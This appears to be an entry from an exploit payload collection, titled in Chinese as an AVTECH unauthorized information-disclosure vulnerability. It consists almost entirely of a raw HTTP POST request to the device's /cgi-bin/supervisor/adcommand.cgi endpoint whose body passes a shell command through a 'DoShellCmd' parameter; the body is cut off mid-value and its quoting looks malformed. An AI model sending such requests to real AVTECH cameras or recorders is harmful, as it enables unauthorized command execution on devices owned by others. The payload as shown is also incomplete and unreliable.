AVTECH 未授權信息洩露漏洞

Payload

POST /cgi-bin/supervisor/adcommand.cgi HTTP/1.1

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0

Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Connection: close

Upgrade-Insecure-Requests: 1

Content-Type: application/x-www-form-urlencoded

Content-Length: 23

DoShellCmd "strCmd=expr